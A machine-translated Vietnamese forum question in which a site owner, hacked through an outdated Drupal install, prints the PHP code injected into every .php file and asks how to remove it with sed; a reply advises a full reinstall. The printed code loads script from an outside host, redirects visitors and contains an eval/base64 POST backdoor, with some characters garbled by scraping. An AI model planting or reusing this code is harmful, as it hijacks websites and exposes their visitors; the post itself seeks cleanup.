tôi đã bị hack bằng cách chạy cài đặt Drupal thực sự đã lỗi thời (xấu hổ về tôi)sed, thay thế dòng đầu tiên
Có vẻ như họ tiêm sau trong mỗi .php
tập tin;
<?php global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = "lb11";
if([email protected]$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if([email protected]_sent()) { @setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
}
else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if([email protected]_sent()) {
@setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
sessdt_j = @$_SERVER["HTTP_HOST"][email protected]$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
Tôi có thể tháo và thay thế điều này bằng sed
? ví dụ:
find . -name *.php | xargs ...
Tôi hy vọng sẽ có trang web hoạt động chỉ trong thời gian sử dụng wget và tạo bản sao tĩnh.
Tôi đoán nó là hơi muộn , nhưng đối với bất kỳ ai có thể ở trong tình huống tương tự: Không bao giờ cố gắng sửa chữa một hệ thống bị tấn công. Giải pháp duy nhất là cài đặt lại từ đầu và chỉ sao chép các tệp cấu hình đã xác minh bằng tay và kết xuất DB. – Dunatotatos